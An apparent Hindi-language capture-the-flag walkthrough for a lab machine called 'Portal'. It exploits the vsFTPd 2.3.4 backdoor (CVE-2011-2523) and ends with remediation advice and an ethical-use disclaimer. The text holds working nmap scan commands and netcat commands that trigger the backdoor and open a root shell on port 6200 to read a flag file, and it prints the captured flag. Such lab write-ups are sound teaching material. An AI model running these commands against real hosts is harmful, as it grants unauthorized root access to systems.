
'Portal' मशीन के लिए एक विस्तृत पैठ परीक्षण वॉकथ्रू और शोषण रिपोर्ट, जो रूट एक्सेस प्राप्त करने के लिए CVE-2011-2523 (vsFTPd 2.3.4 Backdoor) पर केंद्रित है।
⚠️ यह परियोजना केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
सिस्टम तक अनधिकृत पहुंच सख्त वर्जित है।
SYAFIQ
भूमिका: मुख्य प्रवेश परीक्षक
| चरण | उपकरण | विवरण |
|---|---|---|
| खोज | Nmap | सक्रिय होस्ट के लिए नेटवर्क स्कैन करें |
| गणना | Nmap | सेवाओं और संस्करणों की पहचान करें |
| विश्लेषण | NSE स्क्रिप्ट | ज्ञात भेद्यता का पता लगाएं |
| शोषण | Netcat | बैकडोर को ट्रिगर करें |
| शोषणोत्तर | टर्मिनल | रूट एक्सेस प्राप्त करें और फ़्लैग प्राप्त करें |
नेटवर्क में सक्रिय होस्ट के लिए स्कैन करें:
nmap -sn --unprivileged 10.150.150.10-30
✅ परिणाम:
-8 होस्ट का पता चला -लक्ष्य पहचाना गया: 10.150.150.12
खुले पोर्ट और सेवाओं को स्कैन करें:
nmap -Pn -F --unprivileged -sV 10.150.150.12
✅ निष्कर्ष:
-पोर्ट 21 → FTP (vsftpd) -पोर्ट 22 → SSH (OpenSSH 8.2p1)
ज्ञात FTP बैकडोर भेद्यता की जाँच करें:
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12
🚨 परिणाम:
-लक्ष्य कमजोर है -CVE-2011-2523 की पुष्टि
दुर्भावनापूर्ण उपयोगकर्ता नाम का उपयोग करके बैकडोर को ट्रिगर करें:
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21
⚡ यह पोर्ट 6200 पर एक छिपा हुआ रूट शेल खोलता है
बैकडोर से कनेक्ट करें और कमांड निष्पादित करें:
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200
रूट एक्सेस प्राप्त हुआ uid=0(root) की पुष्टि
🏁 फ़्लैग प्राप्त हुआ:
5ee499eb5d0b8e4269b13483e57adaa0b3815f48
हमेशा पुरानी सेवाओं को अपडेट करें (vsFTPd कमजोर था) गलत कॉन्फ़िगर की गई सेवाएं पूरे सिस्टम से समझौता कर सकती हैं सरल स्कैन गंभीर कमजोरियों को उजागर कर सकते हैं -🛡️ सिफारिशें -🔄 FTP सेवा को नवीनतम संस्करण में अपडेट करें -🚫 अनावश्यक सेवाएं अक्षम करें -🔐 एक्सेस को प्रतिबंधित करने के लिए फायरवॉल का उपयोग करें -📊 नियमित सुरक्षा ऑडिट करें -📚 अस्वीकरण
साइबर सुरक्षा सीखना नैतिक हैकिंग अभ्यास अधिकृत प्रवेश परीक्षण
❌ इस ज्ञान का उपयोग अवैध गतिविधियों के लिए न करें।
"सुरक्षा कोई उत्पाद नहीं, बल्कि एक प्रक्रिया है।" — हमेशा परीक्षण करें, निगरानी करें और सुधार करें।